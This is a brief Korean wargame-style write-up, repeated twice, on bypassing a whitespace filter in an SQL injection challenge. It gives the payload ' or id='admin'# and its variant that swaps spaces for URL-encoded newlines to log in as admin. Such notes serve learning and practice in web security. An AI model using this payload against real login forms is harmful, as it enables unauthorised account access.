prob _ . () 필터링
whitespace 안됨
whitespace 필터링 우회
"sql injection whitespace bypass" 구글링
whitespace(%20) -> %0a %0b %0c %0d %09
그럼 평소 하던대로
' or id='admin'#
'%0aor%0aid='admin'%23
으로 우회하면 된다.
prob _ . () 필터링
whitespace 안됨
"sql injection whitespace bypass" 구글링
whitespace(%20) -> %0a %0b %0c %0d %09
그럼 평소 하던대로
' or id='admin'#
'%0aor%0aid='admin'%23
으로 우회하면 된다.
댓글